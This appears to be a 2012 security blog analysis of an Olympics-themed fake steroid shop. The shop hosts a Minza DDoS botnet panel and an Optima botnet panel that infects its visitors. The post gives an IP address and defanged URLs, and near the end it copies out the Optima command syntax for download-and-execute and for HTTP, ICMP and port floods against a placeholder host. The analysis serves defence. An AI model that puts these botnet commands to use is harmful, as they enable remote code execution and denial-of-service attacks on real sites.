It looks that cyber criminals do not stop searching new ways to spread its viral threats over Internet.
This time they have been taking advantage of the media coverage of the 2012 London Olympics Games. And have used an ingenious method to spread their malware samples with the olimpics promotion.
Criminals have created a false sales page offering steroids and anabolic online. in fact this Site is a pure lure. Selling Steroids is An illegal market that generate enormous profits selling these products unauthorized without prescription and whose consumers try to emulate Olympic athletes using these chemicals substances.
The malicious URL is
and is hosted at the IP 22.214.171.124 from Lituania.
surprisingly, the Machiavellian minds of criminals when analyzing the malicious Web has been discovered a complex system of botnets for denial of service attacks against Internet sites with a certain "reputation" engaged in the illegal sale of steroids and leave them inaccessible to potential buyers.In this way buyers only will find accesible the malicious URL hxxp:// steroids-buy-anabolic.com where they will be infected by Botnet OPTIMA becoming a zombie machine controlled by this Botnet Panel
We will go into detail in the analysis of this infrastructure DDoS + INFECTION Botnet Attack.
The oriented BOTNET to perform DDOS attacks is called Minza and its control panel is accessible by the URL hxxp://steroids-buy-anabolic.com/minza/ as seen in the screenshot below:
Once accessed the Control Panel you can see the list of commands that have been released for Denial service atatcks against other websites of illegal steroids trade.
This BOTNET controls 19,147 zombie machines to launch synchronized attacks against the Sites indicated, ordering all the zombies computers to perform simultaneously mass petitions against these sites to collapse their servers.
One of the sites of steroid illegal commerce which the attack has been carried out were:
The commands that the botnet can run are:
Panel also allows to track the actions of compromised bots.
For the infection infraestructre criminals have used the Control Panel of OPTIMA BOTNET created by Darkness group.
This control panel is accessed via the URL:
And login screen looks like this:
Once accessed the Control Panel shows all information related to botnets and commands that are running on infected machines.
The malicious binary downloaded on compromised machines was:
That now has been removed.
The first infection was recorded on 25.05.2012 at 16:14:47, a few months before starts of the Olympic Games, and control 7763 bots in total.
The list of commands that can be executed on the compromised computers are:
exe=http://host.com/exe.exe --> Download and execute file
dd1=http://host.com/script.php|5 --> Start http attack
dd2=host.com|5 --> Start icmp attack
dd3=host.com:21 --> Start port attack
tot=10 --> Bots sync time
vot=http://host.com/vote.php --> Voting
wtf --> Stop all commands
Below is the record of Bots that controls Optima Bonet Panel: